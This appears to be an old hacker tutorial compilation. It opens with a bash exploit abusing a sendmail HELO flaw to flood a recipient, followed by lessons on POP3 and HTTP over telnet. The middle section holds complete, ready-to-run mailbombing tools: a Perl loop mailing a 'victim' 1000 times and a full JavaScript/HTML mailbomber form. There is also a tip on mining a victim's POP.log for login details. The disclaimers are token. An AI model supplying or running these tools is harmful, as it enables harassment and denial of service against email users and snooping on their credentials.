-- EXPLOIT CODE --

#!/bin/bash

TMPDIR=/tmp/`whoami`

PLIK=$TMPDIR/.safe

TIMEOUT=2

LIMIT=10

MAX=20

echo

echo "SafeBomb 1.02b -- sendmail HELO hole usage example"

echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"

echo

if [ "$4" = "" ]; then

echo "USAGE: $0 msgfile address server sender"

echo

echo " msgfile - file to send as a message body"

echo " address - address of lucky recipient"

echo " server - outgoing smtp server w/sendmail"

echo " sender - introduce yourself"

echo

echo "WARNING: For educational use ONLY. Mailbombing is illegal."

echo "Think twice BEFORE you use this program in any way. Also,"

echo "I've never said this program is 100% safe nor bug-free."

echo

sleep 1

exit 0

fi

if [ ! -f $1 ]; then

echo "Message file not found."

echo

exit 0

fi

echo -n "Preparing message..."

mkdir $TMPDIR &>/dev/null

chmod 700 $TMPDIR

echo "echo \"helo

_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_

_safebomb__safebomb__safebomb__sa

febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa

febomb__safebomb__safebomb__safebomb__safebomb__saf

ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf

ebomb__safebomb__safebomb__safebomb__safebomb__safe

bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe

bomb__safebomb__safebomb__safebomb__safebomb__safeb

omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb

omb__safebomb__safebomb__safebomb__safebomb__safebo

mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo

mb__safebomb__safebomb__safebomb__safebomb__safebom

b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom

b__safebomb__safebomb__safebomb__safebomb__safebomb

b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom

b__safebomb__safebomb__safebomb__safebomb__safebomb

__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb

__safebomb__safebomb__safebomb__safebomb__safebomb_

_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_\""

>$PLIK

echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK

echo "echo \"rcpt to: $2\"" >>$PLIK

echo "echo \"data\"" >>$PLIK

echo "cat <<__qniec__" >>$PLIK

cat $1 >>$PLIK

echo "__qniec__" >>$PLIK

echo "echo \".\"" >>$PLIK

echo "echo \"quit\"" >>$PLIK

echo "sleep $TIMEOUT" >>$PLIK

chmod +x $PLIK

echo "OK"

echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."

SENT=0

while [ -f $1 ]; do

$PLIK|telnet $3 25 &>/dev/null &

let SENT=SENT+1

echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"

CONNECTED=`ps|grep -c "telnet $3"`

if [ "$LIMIT" -le "$CONNECTED" ]; then

while [ "$LIMIT" -le "$CONNECTED" ]; do

sleep 1

done

fi

if [ "$SENT" -ge "$MAX" ]; then

echo "It's just an example, sorry."

echo

exit 0

fi

done

-- EOF --

Suggested fix: insert additional length limit into HELO/EHLO parameter scanning routine OR disable AllowBogusHELO (but it may cause serious troubles). I have no 8.8.8 sources at the time, so execuse me if it's unclear.

PS:

--

From: Gregory Neil Shapiro <sendmail+gshapiro@sendmail.org>

I was able to reproduce the header problem by lengthening the HELO string in your script.

[...]

This will be fixed in sendmail 8.9.

--

******ROOTSHELL***********

Receiving mail without an Email client POP3 (Port 110)

Now that you know practicaly almost everything that one can think about sending emails, let's move on to receiving emails the kewl way.Normally what you do islaunch your favourite email client and click on the receive buttton to start downloading new messages. Now the email client connects to your mail server and starts issuing POP commands. So this is how a normal procedure of downloading emails takes place.

*************

Hacking Truth: Just like Outlook Express maintains a log file which contains various POP commands that it issued to download emails from the mail server.

This file is the POP.log file which is again stored in the "c:\windows\Applicartion Data" folder.Just search for it. One can go through it to find out the Username, mail server and also the length of password of the victim.

*************

So what exactly is POP? POP or Post Office Protocol is nothing but a protocol which is used to download messages from a mail server.A mail server implementing the the POP protocol stores the emails for users. It serves email clients which download messages by giving POP commands. A POP server stores the email until the user log in to retrieve the messages. Once the messages are downloaded, the server no longer maintains them.

POP3 is nothing but the third version that is the latest version of the Post Office Protocol.

The POP daemon runs by default on Port 110 and is not as co operative as Sendmail is and also does not provide any help. Unlike the Sendmail daemon it requires the user to enter a UserName and Password. Hence, A person is not able to download emails unless and until he has authenticated himself by providing a User Name and Password.So let's learn POP3.

Launch Telnet and telnet to Port 110 of your mail server by issuing the command:

telnet mail2.isp.net 110

You will be welcomes by the daemon banner, which would probably be something like:

+OK QPOP (version 2.53) at delhi1.mtnl.net.in starting.

This means that the daemon is ready for your input. Now let's see what happens if you type Help at the prompt. Most servers will disconnect you as soon as it encounters a wrong move from the client. My ISP does not disconnect me but I do not get any response at all.The Telnet client just hangs.The '?' command too doesn't bring about any response. The POP daemon is really cranky and it doesn't stand any 'roobish' (read rubbish) at all. So unfortunately all those of all who are as forgetful as I am will have to somehow remember POP commands.

Firstly before you can issue any other command, one has to provide the POP daemon with a Username and Password. So use the USER command to provide the Password and the PASS command to provide the password.Let's say my Username is ankit and the password is hackingtruths, then I would login in the following way:

USER ankit

The server replies:

+OK Password required for ankit.

Now we need to give the POP daemon what it needs a password:

PASS hackingtruths

The server replies:

+OK ankit has xx messages (yyyyy octets).

Where xx is the number of new messages and yyyyy is the space occupied by them.

For example if I have 22 new messages which occupy 135981 octets then I would get something like:

+OK ankit has 22 messages (135981 octets).

Now if either the username or Password is incorrect them you will receive an error message, something like:

-ERR Bad login (If the Username is invalid)

-ERR Password supplied for "usernamehere" is incorrect. (If the Username is

correct but the Password is incorrect.)

Now that you have verified yourself, let's list the new messages by giving the

'list' command.

For Example, I have 2 new message in my Inbox and when I give the list command the server return the following:

I type the list command:

list

The server returns

+OK 2 messages (8164 octets)

1 2471

2 5693

.

The numbers on the right of each message number is the size of the new email. Note the email numbers which in the above case are 1 and 2 are important as they are used to delete or read a particular email.They act as what filenames act to files.Now to read a particular messge type the 'retr' command followed by the email number. For Example to view the email whose number is 1, I type:

retr 1

This is show the entire email with full headers. Make sure you log that particular session before you try to view messages this way as messages scroll past at a very high speed.

Similiarly the 'dele' command followed by the message number can be used to delete a pasticular message. For example, the first email can be deleted by giving the command:

dele 1

The server responds:

+OK Message 1 has been deleted.

There is yet another not so well known command, the 'stat' command which

Gives the number of new messages and the size of the new messages.

For example, I type stat:

Stat

The server responds:

+OK 22 135981

Indicating that I have 22 new messages whose total size is 135981

Once you are done with everything type the 'quit' command to end the

session.

The server responds:

+OK Pop server at delhi1.mtnl.net.in signing off.

MailBombing

Mailbombing means to send a huge number of emails (maybe hundres, thousands or even millions) to a single email account so that the maximum space of the account is filled up and the owner of the account cannot receive any other important emails and it becomes difficult for the user to read existing emails due to gigantic number of emails.

All email accounts have a maximum space limit, for example Yahoo has a space limit of 3 MB. Now if this maximum space is filled up then no new messages can come and the mail server sends back any new messages that come, once the maximum allowed capacity is filled. (Some services allow the users to exceed the assigned limit.) So if the victim who has been mail bombed is excepting any new important messages then he can pretty much kiss them goodbye. Not only that, his Inbox is filled with so many new useless messages, he cannot even read the existing messages and deleting all the useless messages takes up a lot of valuable time.

MailBombing is a very irritating and a lame thing to do. It is the malest thing a hacker could possibly do but I am just putting forward all info that I can. Do not mail bomb someone, I certainly do not recommend it.

There are 2 types of mailbombing-:

1. Mass Mail Bombing

2. List Linking

The Mass Mail Bombing Method

In this kind of mail bombing the victim's Inbox is flooded with a huge number of the same emails. There are mail bombing software which allow you to send a particular message as many times as you want using a SMTP server.Some mail bombing software also allows you to send a particular message perpetually. A

Mail bombing software can easily be made in Perl. The following is a script that I picked up somewhere on the net (It runs only on Unix platforms):

#!/bin/perl

$mprogram= '/usr/lib/sendmail';

$victim= 'victim@hostname.com';

$var=0;

while($var < 1000) {

open(MAIL, "|$mprogram $victim") || die "Can't open Mail Program\n";

print MAIL "Mail Bomb";

close(MAIL);

sleep(4);

$var++;

}

This Perl script will send 1000 mails to the victim. It can easily be modified to send 100000 messages instead of only 1000.

Such kind of mail bombing has one shortcoming, say you sent the victim 1000 messages, but once the victim has deleted them, that's it, that's the end of the whole idea of mail boming the victim.This is where List Linking comes in as it is more effective in harassing the victim.

List Linking

In this kind of mail bombing the victim is subscribed to thousands of mailing lists whose subjects range from Beetle lovers to people interested in seeing earthworms eat things.This kind of mail boming is more effective as the victim has to find out ways of unsubscribing himself from this long list of boring mailing lists. Believe me, many people have problems unsubscribing from mailing lists.

The most common method used by people to mail bomb someone, is to use Mail Bombing Software. Mail Bombing software asks for the victim's email address, the address of a SMTP server, the forged email address from which you want the Mail bombs to appear to have come and the number of emails that have to be sent and of course the body of the mail bomb. Mail Bombing is as easy as a few clicks and it is really common amon gst lamers with a huge ego.

Now let's see what you do when you are mail bombed.You open your Inbox and find that you have 20000 new messages with the same subject "You suck!!!". So you are sure that, that lamer that hates you so much has proved his lameness (is that a word?) by mail bombing you. No..you do not start downloading all the 20000 messages and then delete them, instead you log on to the POP port of your mail server and delete the useless mails by issuing POP commands. If you are able to read the headers well enough then you can easilt trace the mail bomber and kick him off his ISP by complaining to tech support.

Mail Bombers are very simple to design. Having knowledge of C or Perl can make things really really easy. I designed a Simple Mail Bomber in JavaScript. Although not too efficient, it gives you an idea, how easy it is to make a Mail Bomber. It also allows you to specify the number of bombs. The only shortcoming is that the victim will easily know who sent the mail bombs as this JavaScript Bomber does not forge email, instead it uses the user's normal read email address to bomb the victim.To understand the code you need to know HTML and JavaScript. Simply copy and paste the following code into Notepad and save it as .htm or .html file.

############CUT HERE###########

<HTML>

<HEAD>

<TITLE>Ankit's MailBomber</TITLE>

<script language="JavaScript">

<!--

function checkAGE(){if (confirm

("This Mail Bomber Belongs to Ankit Fadia----ankit@bol.net.in"));return " "}

document.writeln(checkAGE())---->

</Script>

</HEAD>

<BODY ulink="white" vlink="white" alink="white" BGCOLOR="#000000"

TEXT="#FFFFFF" ONLOAD="ResetForm()" BODY>

<P><SCRIPT LANGUAGE="JavaScript"><!-- JavaScript MailBomber

var mail123 = 10000

function MailBombing(iInterval)

{

document.Bomber.submit();

if (document.SetupMailData.NumberOfBombs.value-- > 0)

{

window.setTimeout('MailBombing()',mail123);

}

else

alert("MailBombing...");

}

function VerifyNumber(iNumber)

{ var i;

var ch = "";

for (i=0;i<iNumber.length;i++)

{

ch = iNumber.substring(i,i+1)

if (ch < "0" || ch > "9")

return false;

}

return true;

}

function MailBomb()

{

var szMsg;

if (document.SetupMailData.UserToBomb.value == "")

{

alert("Please enter a valid email address to mailbomb.");

document.SetupMailData.UserToBomb.focus;

return;

}

if (VerifyNumber(document.SetupMailData.NumberOfBombs.value)==false)

{

alert("Invalid Number of Bombs");

document.SetupMailData.NumberOfBombs.focus;

return;

}

if (document.SetupMailData.Subject.value == "")

{

alert("Please Enter a subject for:"

+document.SetupMailData.UserToBomb.value);

document.SetupMailData.Subject.focus;

return;

}

if (document.Bomber.text.value == "")

{

alert("Please Enter Message");

document.Bomber.text.focus; // set user focus to here

return;

}

szMsg = "Mail Bombing: " + document.SetupMailData.UserToBomb.value +

"\n";

szMsg += "Please Wait while MailBombeing is completed."

szMsg += "You will Be Notified when the "

szMsg += "MailBombing Completes."

alert(szMsg);

document.Bomber.action = "mailto:" +

document.SetupMailData.UserToBomb.value + "?subject=" +

document.SetupMailData.Subject.value;

MailBombing(mail123);

}

function ResetForm()

{

document.SetupMailData.UserToBomb.value = "";

document.SetupMailData.Subject.value = "Enter Subject Here";

document.SetupMailData.NumberOfBombs.value = 1000000;

document.Bomber.text.value = "Enter Message Here";

}

// End of hiding our code --></SCRIPT></P>

 

<CENTER><P>

</font>

</b>

</b>

<CENTER><P><FORM NAME="SetupMailData">Victim's Email Address:<BR>

<INPUT TYPE=text NAME="UserToBomb" SIZE=62></P></CENTER>

<CENTER><P>Number of Email Bombs:<BR>

<INPUT TYPE=text NAME="NumberOfBombs" VALUE=10000 SIZE=10></P></CENTER>

<CENTER><P>Subject:<BR>

<INPUT TYPE=text NAME="Subject" SIZE=62></FORM></P></CENTER>

<CENTER><P><FORM METHOD=POST NAME="Bomber" ENCTYPE="text/plain">Message:<BR>

<TEXTAREA ROWS=10 COLS=60 NAME="text"></TEXTAREA></P></CENTER>

<CENTER><P><INPUT name="btnBombUser" TYPE=button onClick="MailBomb()"

value="Mail Bomb User"><BR>

<BR>

<BR>

</FORM><BR>

Coded By: Ankit Fadia----ankit@bol.net.in <br>

<a href="http://hackingtruths.webprovider.com">

http://hackingtruths.webprovider.com</a>

For more tutorials send an email to: programmingforhackers-subscribe@egroups.com

<BR>

</BODY>

</HTML>

##########CODE ENDS HERE########

HTTP Torn Apart(Port 80)

What exactly happens when you type a URL(Uniform Resource Locator) in the location bar of the browser? Well firstly the browser performs a DNS queiry and converts the human readable domain name (like hotmail.com) into a machine readable IP address. Once the browser gets the IP address of the host, it connects to Port 80 (The HTTP daemon by default runs on Port 80) of the remote host and asks the host for a particular document or page with the help of HTTP commands. HTTP or HyperText Transfer Protocol is the protocol used by browsers to communicate with hosts i.e. to ask for a particular file at a specific URL or to send or post data to the server.We are never aware of this process which occurs in the background.

Now in this section we will learn to do manually what the browser does automatically. When the browser asks for a file at a specific URL it is said to 'request' for information. Now before we move on, let's see what a typical request looks like. A typical HTTP request would be something like the below:

get url HTTP/1.1

Let's see what the specific parts of a typical request stands for.The first word i.e. the 'get' part is called the method.There are 3 types of methods-:

The Get method

The 'get' method is the most common method which is widely used.It is with the 'get' method that the browsers request for pages or douments. In this kind of method you are the client (browser) and request for a page from the server which is the host you are connected to.

The Post Method

The 'post' method is used to upload files to the server.This kind of method is used say when you upload your website by using not the FTP service but by straightaway uploading files through a HTML page.I n this method there is a reversal of roles and now you become the server and the host you are connected to becomes the client.

The Head Method

The 'head' method is the least popular method and not many people know about it. Although not widely used, it is still a part of HTTP methods. You would use the 'head' method say when you want to make sure that a particualar file exists at a particular URL without downloading the entire file.This method just downloads the header info of a particular file and not the entire file.

All this might seem a bit weird, but I suggest that you just understand the basic difference between the various methods and then move on.

Anyway coming back to the various parts of a HTTP request.The first part as you now know is the method, now the second part is the URL that you are requesting. Say for example I want to request the contacts.htm file then the HTTP request would look something like:

get /contacts.htm HTTP/1.1

Now you may ask where the first '/' has come from. Now to understand that you need to look at the URL that you type into the Location bar of the browser. Say for example, the HTML file that you are requesting is http://www.microsoft.com/ windows. htm then the URL would be what is left after removing the http:// and the domain name i.e. www.microsoft.com. Hence the URL is /windows.htm

Now what will the URL be if you want to request for Yahoo homepage? Normally you write http://www.yahoo.com in the location bar to access Yahoo's homepage. Now if we remove the http:// and also the domain name(www.yahoo.com) then what is left? Nothing. This means the URL of the HTTP request is '/'. Hence the HTTP request now looks like.

get / HTTP/1.1

The third part of the HTTP request is pretty self explanatory.The HTTP/1.1 specifies the version of the HTTP service used by the browser.So say if a server is running HTTP/1.1 and a browser which is running HTTP/1.0 requests a page then the server will send the page in terms of HTTP/1.0 only removing the enhancements of HTTP/1.1

So now that you know what a normal HTTP request sent by your browser looks, let's find out how we can do this manually.This too requires Telnet. Now you know how important the Telnet client is in a Hacker's armoury. So launch your Telnet client and connect to Port 80(As the HTTP daemon runs on Port 80) of any host. If the host you are trying to connect to does not have a website i.e does not have Port 80 open, then you would get a Error Message. If the connection is successful then the Title bar of your Telnet client will show the host address you are connected to and it will be ready for user input.

The HTTP daemon is not as boring as it seems to be till now. In fact it is very very interesting. Once telnet is ready for input just type h (or any other letter) and hit enter twice.

***********

Hacking Truth: After each HTTP command one has to press Enter Twice to send the command to the server or to bring about a response from a server. It is just how the HTTP protocol works.

**********

Now as 'h' or any other command that you typed is not a valid HTTP command, the server will give you an error message, something like the below:

HTTP/1.1 400 Bad Request

Server: Netscape-Enterprise/3.5.1

The server replies with the version of HTTP it is running (not so important), it gives us an error message and the error code associated with it (again not so important), but it also gives us the OS name and OS version, it is running.Wow!!! It gives hackers who want to break into their server the ultimate piece of information which they require.

Anyway now let's see what happens when we give a normal authentic request requesting for the main page of Yahoo. So after I telnet to Port 80 of www.yahoo.com I give the command:

get / http/1.1

(requesting for the Yahoo Homepage)

HTTP/1.0 200 OK

Content-Length: 12085

Content-Type: text/html

(No OS name, interesting, well Yahoo being a Top Web Company has configured their server to not display the OS name and Version when an HTTP request is encountered.)

<html><head><title>Yahoo!</title><base href=http://www.yahoo.com/><meta

http-

equiv="PICS-Label" content='(PICS-1.1 "http://www.rsac.org/ratingsv01.html"

l

gen true for "http://www.yahoo.com" r (n 0 s 0 v 0 l

0))'></head><body><center><form

action=http://search.yahoo.com/bin/search><map

name=m><area coords="72,0,130,58" href=r/wn><area coords="131,0,189,58"

href=http://mail.yahoo.com><area coords="414,0,472,58" href=r/i1><area

coords="473,0,531,58" href=r/hw></map><img width=600 height=59 border=0

usemap="#m" src=http://a1.g.a.yimg.com/7/1/31/000/us.yimg.com/i/main4s3.gif

alt=Yahoo><br><table border=0 cellspacing=0 cellpadding=4 width=600><tr><td

align=center width=160>

<a href="/homet/?http://auctions.yahoo.com"><b>Yahoo!

Auctions</b></a><br><small><a

href="/homet/?http://list.auctions.yahoo.com/27813-category.html">Pokemon</a>,

<a href="/homet/?http://list.auctions.yahoo.com/26360-category-

leaf.html">cars</a>, <a href="/homet/?http://list.auctions.yahoo.com/40291-

category-leaf.html">'N Sync</a></small></td><td align=center><a

href="http://rd.yahoo.com/M=26036.208672.1462854.389576/S=2716149:NP/A=167764/?h

ttp://messenger.yahoo.com/" target="_top"><img width=230 height=33

src="http://a32.g.a.yimg.com/7/32/31/000/us.yimg.com/a/ya/yahoopager/messenger/m

essengermail.gif" alt="Yahoo! Messenger" border=0></a></td><td align=center

width=160><a href="/homet/?http://mail.yahoo.com"><b>Yahoo!

Mail</b></a><br>free

email for life</td></tr><tr><td colspan=3 align=center><input size=30

name=p>

<input type=submit value=Search> <a href=r/so>advanced

search</a></td></tr></table><table border=0 cellspacing=0 cellpadding=4

width=600><tr><td nowrap align=center><small><a href=r/sh>Shopping</a> -

<a href=r/os><b>Auctions</b></a> -

<a href=r/yp>Yellow Pages</a> -

<a href=r/ps>People Search</a> -

<a href=r/mp>Maps</a> -

<a href=r/ta>Travel</a> -

<a href=r/cf>Classifieds</a> -

<a href=r/pr>Personals</a> -

<a href=r/pl>Games</a> -

<a href=r/yc>Chat</a> -

<a href=r/ub><b>Clubs</b></a><br><a href=http://mail.yahoo.com>Mail</a> -

<a href=r/ca>Calendar</a> -

<a href=r/pg>Messenger</a> -

<a href=r/cm><b>Companion</b></a> -

<a href=r/i2>My Yahoo!</a> -

<a href=r/dn>News</a> -

<a href=r/ys>Sports</a> -

<a href=r/wt>Weather</a> -

<a href=r/tg>TV</a> -

<a href=r/sq>Stock Quotes</a> -

<a href=r/xy>more...</a></small></td></tr><tr><td></td></tr></table><table

border=0 cellspacing=0 width=600><tr><td bgcolor=339933><table border=0

cellspacing=0 cellpadding=0><tr><td

height=2></td></tr></table></td></tr></table><table border=0 cellspacing=7

cellpadding=2><tr><td valign=top align=center>

<table cellspacing=0 cellpadding=3 border=0 width="100%"><tr><td

align=center

bgcolor=99cc99><font face=arial><a href=r/s/1><b>Yahoo!

Shopping</b></a></font><small> - Thousands of stores.

Millions of products.</small><table cellspacing=0 cellpadding=2 border=0

width="100%"><tr><td align=center bgcolor=ffffff><table cellspacing=0

border=0

width="100%"><tr><td colspan=2><font face=arial

size=2><b>Departments</b></font></td><td><font face=arial

size=2><b>Stores</b></font></td><td><font face=arial

size=2><b>Products</b></font></td></tr><tr><td valign=top

width="22%"><small>&#183;

<a href=r/s/2>Apparel</a><br>&#183;

<a href=r/s/3>Bath/Beauty</a><br>&#183;

<a href=r/s/4>Computers</a><br>&#183;

<a href=r/s/5>Electronics</a></small></td><td valign=top

width="22%"><small>&#183;

<a href=r/s/10>Flowers</a><br>&#183;

<a href=r/s/11>Sports</a><br>&#183;

<a href=r/s/7>Music</a><br>&#183;

<a href=r/s/9>Video/DVD</a></small></td><td valign=top width="31%"><small>

&#183; <a href=r/s/eb>Eddie Bauer</a><br>

&#183; <a href=r/s/ash>Ashford</a><br>

&#183; <a href=r/s/toys>Toys R Us</a><br>

&#183; <a href=r/s/nord>Nordstrom</a><br>

</small></td><td valign=top width="25%"><small>

&#183; <a href=r/s/nsync>'N Sync</a><br>

&#183; <a href=r/s/cam>Digital cameras</a><br>

&#183; <a href=r/s/poke>Pokemon</a><br>

&#183; <a href=r/s/mp3>MP3 players</a><br>

</small></td></tr></table></td></tr></table></td></tr></table>

<table border=0 cellspacing=0 cellpadding=4><tr><td valign=top

nowrap><small><font size=3 face=arial><a href=r/ar><b>Arts &

Humanities</b></a></font><br><a href=r/li>Literature</a>,

<a href=r/ph>Photography</a>...<br><br><font size=3 face=arial><a

href=r/bu><b>Business & Economy</b></a></font><br><a

href=r/co>Companies</a>,

<a href=r/fi>Finance</a>,

<a href=r/jo>Jobs</a>...<br><br><font size=3 face=arial><a

href=r/ci><b>Computers & Internet</b></a></font><br><a

href=r/in>Internet</a>,

<a href=r/ww>WWW</a>,

<a href=r/sf>Software</a>,

<a href=r/ga>Games</a>...<br><br><font size=3 face=arial><a

href=r/ed><b>Education</b></a></font><br><a href=r/un>College and

University</a>,

<a href=r/k2>K-12</a>...<br><br><font size=3 face=arial><a

href=r/en><b>Entertainment</b></a></font><br><a href=r/cl>Cool Links</a>,

<a href=r/mo>Movies</a>,

<a href=r/hu>Humor</a>,

<a href=r/mu>Music</a>...<br><br><font size=3 face=arial><a

href=r/go><b>Government</b></a></font><br><a href=r/el>Elections</a>,

<a href=r/mi>Military</a>,

<a href=r/la>Law</a>,

<a href=r/tx>Taxes</a>...<br><br><font size=3 face=arial><a

href=r/he><b>Health</b></a></font><br><a href=r/md>Medicine</a>,

<a href=r/ds>Diseases</a>,

<a href=r/dg>Drugs</a>,

<a href=r/ft>Fitness</a>...</small></td><td valign=top nowrap><small><font

size=3 face=arial><a href=r/nm><b>News & Media</b></a></font><br><a

href=r/fc>Full Coverage</a>,

<a href=r/nw>Newspapers</a>,

<a href=r/tv>TV</a>...<br><br><font size=3 face=arial><a

href=r/rs><b>Recreation

& Sports</b></a></font><br><a href=r/sp>Sports</a>,

<a href=r/tr>Travel</a>,

<a href=r/au>Autos</a>,

<a href=r/od>Outdoors</a>...<br><br><font size=3 face=arial><a

href=r/rf><b>Reference</b></a></font><br><a href=r/lb>Libraries</a>,

<a href=r/dc>Dictionaries</a>,

<a href=r/qt>Quotations</a>...<br><br><font size=3 face=arial><a

href=r/re><b>Regional</b></a></font><br><a href=r/ct>Countries</a>,

<a href=r/rg>Regions</a>,

<a href=r/us>US States</a>...<br><br><font size=3 face=arial><a

href=r/sc><b>Science</b></a></font><br><a href=r/am>Animals</a>,

<a href=r/as>Astronomy</a>,

<a href=r/eg>Engineering</a>...<br><br><font size=3 face=arial><a

href=r/ss><b>Social Science</b></a></font><br><a href=r/ac>Archaeology</a>,

<a href=r/ec>Economics</a>,

<a href=r/lg>Languages</a>...<br><br><font size=3 face=arial><a

href=r/cu><b>Society & Culture</b></a></font><br><a href=r/pe>People</a>,

<a href=r/ev>Environment</a>,

<a href=r/rl>Religion</a>...</small></td></tr></table></td>

<td align=right valign=top bgcolor=dcdcdc width=155><table border=0

cellspacing=1 width="100%"><tr><td align=center bgcolor=ffffcc nowrap

colspan=2><table border=0 cellspacing=0 cellpadding=0 width=120><tr><td

align=center><font face=arial size=2><b>In the

News</b></font></td></tr></table></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://fullcoverage.yahoo.com/fc/world/Elian_Gonzalez/">Reno

says

Elian to be returned to father</a></small></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://fullcoverage.yahoo.com/Full_Coverage/World/Zimbabwe/">Zimba

bwe land seizures continue</a></small></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://sports.yahoo.com/pga/">The Masters</a>, <a

href="/homer/?http://sports.yahoo.com/mlb/">MLB</a>, <a

href="/homer/?http://sports.yahoo.com/nba/">NBA</a></small></td></tr><tr><td

align=right colspan=2><a

href=r/xn><small>more...</small></a></td></tr><tr><td

align=center bgcolor=ffffcc colspan=2><font face=arial

size=2><b>Marketplace</b></font></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://taxes.yahoo.com/">Y! Tax Center</a> - tax guide, online

filing, and more</small></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href=/homer/?http://b2b.yahoo.com>Y!

Business Marketplace</a> - products for all

industries</small></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small>Free <a

href="/homer/?http://www.bluelight.com/isp.html">56K Internet

Access</a></small></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://bills.yahoo.com/">Yahoo! Bill Pay</a> - free 3-month

trial

</small></td></tr><tr><td align=right colspan=2><a

href=r/xm><small>more...</small></a></td></tr><tr><td align=center

bgcolor=ffffcc colspan=2><font face=arial size=2><b>Inside

Yahoo!</b></font></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://movies.yahoo.com">Y! Movies</a> - showtimes, reviews,

info</small></td></tr><tr><td valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://photos.yahoo.com/">Yahoo! Photos</a> - upload, share,

and

print pictures</small></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small>Play free <a

href="/homer/?http://baseball.fantasysports.yahoo.com/baseball/">Fantasy

Baseball</a></small></td></tr><tr><td

valign=top><b>&#183;</b></td><td><small><a

href="/homer/?http://geocities.yahoo.com/home/">Yahoo! GeoCities</a> - build

your free home page</small></td></tr><tr><td align=right colspan=2><a

href=r/xi><small>more...</small></a></td></tr></table></td></tr></table>

<table border=0 cellspacing=0 width=600><tr><td bgcolor=339933><table

border=0

cellspacing=0 cellpadding=0><tr><td

height=2></td></tr></table></td></tr></table>

</form><form action=http://search.local.yahoo.com/zipsearch><table border=0

cellspacing=4 cellpadding=0><tr><td align=right valign=top

nowrap><small><b>World Yahoo!s</b></small></td><td></td><td valign=top

colspan=2><small><i>Europe</i> :

<a href=r/dk>Denmark</a> -

<a href=r/fr>France</a> -

<a href=r/de>Germany</a> -

<a href=r/it>Italy</a> -

<a href=r/no>Norway</a> -

<a href=r/es>Spain</a> -

<a href=r/se>Sweden</a> -

<a href=r/uk>UK & Ireland</a><br><i>Pacific Rim</i> :

<a href=r/ai>Asia</a> -

<a href=r/an>Australia & NZ</a> -

<a href=r/cc><b>China</b></a> -

<a href=r/cn>Chinese</a> -

<a href=r/hk>HK</a> -

<a href=r/jp>Japan</a> -

<a href=r/kr>Korea</a> -

<a href=r/sg>Singapore</a> -

<a href=r/tw>Taiwan</a><br><i>Americas</i> :

<a href=r/ag><b>Argentina</b></a> -

<a href=r/br>Brazil</a> -

<a href=r/cd>Canada</a> -

<a href=r/mx>Mexico</a> -

<a href=r/ep>Spanish</a></small></td></tr><tr><td align=right

nowrap><small><b>Yahoo! Get Local</b></small></td><td></td><td

nowrap><small><a

href=r/lo>LA</a> -

<a href=r/ny>NYC</a> -

<a href=r/ba>SF Bay</a> -

<a href=r/ch>Chicago</a> -

<a href=r/mm>more...</a> &nbsp;&nbsp;</small></td><td nowrap><small><input

name=q size=5 maxlength=5>&nbsp;<input type=submit value="Enter Zip

Code"></small></td></tr><tr><td align=right valign=top

nowrap><small><b>Other</b></small></td><td></td><td valign=top

colspan=2><small><a href=r/ya>Autos</a> -

<a href=r/em>Careers</a> -

<a href=r/di>Digital</a> -

<a href=r/ye>Entertainment</a> -

<a href=r/le><b>Event Guide</b></a> -

<a href=r/gr>Greetings</a> -

<a href=r/yh>Health</a> -

<a href=r/iv><b>Invites</b></a> -

<a href=r/ne>Net Events</a><br><a href=r/ms>Message Boards</a> -

<a href=r/mv>Movies</a> -

<a href=r/rk>Music</a> -

<a href=r/yr>Real Estate</a> -

<a href=r/sb>Small Business</a> -

<a href=r/il>Y! Internet Life</a> -

<a href=r/yg>Yahooligans!</a></small></td></tr></table></form><table

border=0

cellspacing=0 width=600><tr><td bgcolor=339933><table border=0 cellspacing=0

cellpadding=0><tr><td height=2></td></tr></table></td></tr></table><table

border=0 cellspacing=6 cellpadding=0><tr><td align=right><a

href=r/vs><small>Yahoo! prefers</small></a></td><td><a href=r/vs><img

width=37

height=23 border=0

src=http://a1.g.a.yimg.com/7/1/31/000/us.yimg.com/a/vi/visa/sm.gif></a></td></tr

></table><small><a href=r/ad>How to Suggest a Site</a> -

<a href=r/cp>Company Info</a> -

<a href=r/pv>Privacy Policy</a> -

<a href=r/ts>Terms of Service</a> -

<a href=r/cb>Contributors</a> -

<a href=r/hr>Openings at Yahoo!</a><p>Copyright &copy; 2000 Yahoo! Inc. All

rights reserved.<br><a href=r/cy>Copyright

Policy</a></small></center></body></html>

 

The get method gives the HTML source of the document requested. It seems just as if you are seeing the source by clicking View> Source.

Similiarly you can see what happens when you issue the 'PUT' and 'Head' methods. Just replace 'Get' with the Method that you want to use. For example,

head / http/1.1 and put/ http/1.1

****************

Hacking Truth: Let's go back to the response that we got from the HTTP daemon once the HTTP Get method was okayed at Yahoo.The first line of the response was:

HTTP/1.0 200 OK

